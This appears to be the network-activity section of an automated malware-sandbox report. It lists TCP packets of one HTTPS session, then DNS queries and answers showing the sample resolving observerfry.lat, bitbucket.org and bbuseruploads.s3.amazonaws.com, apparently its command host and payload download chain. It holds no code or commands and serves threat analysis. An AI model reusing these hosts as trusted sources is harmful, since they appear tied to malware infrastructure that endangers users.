                                                                                                                                                              Dec 24, 2024 11:22:42.807511091 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.807521105 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.811918974 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.929708958 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.929778099 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.929812908 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.929826021 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.929871082 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.929893970 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.932560921 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.932605982 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.932640076 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.932646036 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.932677984 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.935966015 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.936023951 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.936043978 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.936050892 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.936081886 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.939604044 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.939656973 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.939678907 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.939687014 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.939716101 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.942410946 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.942481041 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.942488909 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.942545891 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.942552090 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.942594051 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.945419073 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.945465088 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.945544958 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.945553064 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.945585966 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.945606947 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.946191072 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.949057102 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.949079037 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.949120998 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.949126959 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.949157000 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.950932026 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.950937986 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.950985909 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.120063066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.120140076 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.120141029 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.120172977 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.120204926 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.120224953 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.120285034 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.123290062 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.123349905 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.123367071 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.123377085 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.123418093 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.123445034 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.123498917 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.126051903 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.126116037 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.126118898 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.126140118 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.126172066 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.126255035 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.126260042 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.129669905 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.129722118 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.129738092 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.129760981 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.129775047 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.132566929 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.132656097 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.132663012 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.132678986 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.132723093 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.133312941 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.133366108 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.136219978 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.136267900 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.136296034 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.136301041 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.136329889 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.136351109 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.136356115 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.139033079 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.139059067 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.139062881 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.139086008 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.139091969 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.139117956 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.139126062 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.139147997 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.139147997 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.142780066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.142833948 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.142843962 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.142848969 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.142889977 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.142916918 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.142982006 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.164757967 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.313668966 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.313738108 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.313769102 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.313802958 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.313832045 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.313848972 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.313865900 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.316344023 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.316400051 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.316420078 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.316431999 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.316464901 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.319920063 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.319994926 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.320008993 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.320029974 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.320067883 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.322803974 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.322861910 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.322870016 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.322886944 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.322916985 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.326510906 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.326564074 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.326579094 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.326589108 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.326622009 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.329399109 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329499006 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329499960 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.329514027 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329575062 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.330081940 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.330132008 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.331068993 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.332938910 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.332979918 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.333015919 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333069086 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.333107948 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333127975 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333157063 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.348599911 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504105091 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504160881 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504183054 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504192114 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504230022 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504259109 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504271030 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507430077 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507472992 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507499933 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.507505894 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507574081 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.507579088 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510154009 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510202885 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510222912 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510251999 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510271072 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510325909 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510371923 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513719082 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513763905 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513780117 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.513787031 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513835907 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.513845921 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.514039040 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516608953 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516654015 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516701937 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516707897 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516716957 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516772985 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.517435074 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.517544031 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520122051 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520168066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520236969 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520242929 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520291090 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520296097 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.521862030 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523147106 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523191929 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523224115 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523232937 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523262978 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523300886 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523305893 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526715994 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526762962 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526777983 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.526783943 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526834011 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.526849031 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526899099 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.540872097 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.697860956 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.697913885 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.697989941 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698019028 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.698035002 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698456049 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698462963 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700546026 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700599909 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700614929 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.700624943 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700671911 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.700694084 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700740099 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704138041 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704185963 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704216003 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704221010 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704282999 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704282999 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704297066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.706991911 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707036018 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707077980 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.707084894 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707102060 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710479021 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710530043 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710551023 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710556984 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710597038 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710640907 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710691929 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.712780952 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.712955952 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713532925 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713577032 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713594913 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713603020 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713639975 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713685036 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717233896 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717272997 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717308044 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.717314005 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717339993 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.768440962 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.768465996 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.815289021 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.826769114 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.887432098 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.888297081 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.888333082 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.888380051 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.888406992 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.888422012 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.888448954 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.888477087 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.888498068 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.888531923 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.891639948 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.891681910 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.891710997 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.891721964 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.891758919 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.893456936 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.893527985 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.893536091 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.893583059 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.893619061 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.893671036 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.909764051 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.932049990 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:44.068954945 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:44.068988085 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:44.069005013 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:44.069015026 CET4434978416.182.108.137192.168.2.6

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Dec 24, 2024 11:22:14.303999901 CET6015453192.168.2.61.1.1.1
                                                                                                                                                              Dec 24, 2024 11:22:14.535660982 CET53601541.1.1.1192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:36.783044100 CET6443253192.168.2.61.1.1.1
                                                                                                                                                              Dec 24, 2024 11:22:36.922230959 CET53644321.1.1.1192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:39.408106089 CET5919353192.168.2.61.1.1.1
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET53591931.1.1.1192.168.2.6

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Dec 24, 2024 11:22:14.303999901 CET192.168.2.61.1.1.10xc280Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:36.783044100 CET192.168.2.61.1.1.10x4e0dStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.408106089 CET192.168.2.61.1.1.10x921aStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Dec 24, 2024 11:22:14.535660982 CET1.1.1.1192.168.2.60xc280No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:14.535660982 CET1.1.1.1192.168.2.60xc280No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:36.922230959 CET1.1.1.1192.168.2.60x4e0dNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:36.922230959 CET1.1.1.1192.168.2.60x4e0dNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:36.922230959 CET1.1.1.1192.168.2.60x4e0dNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
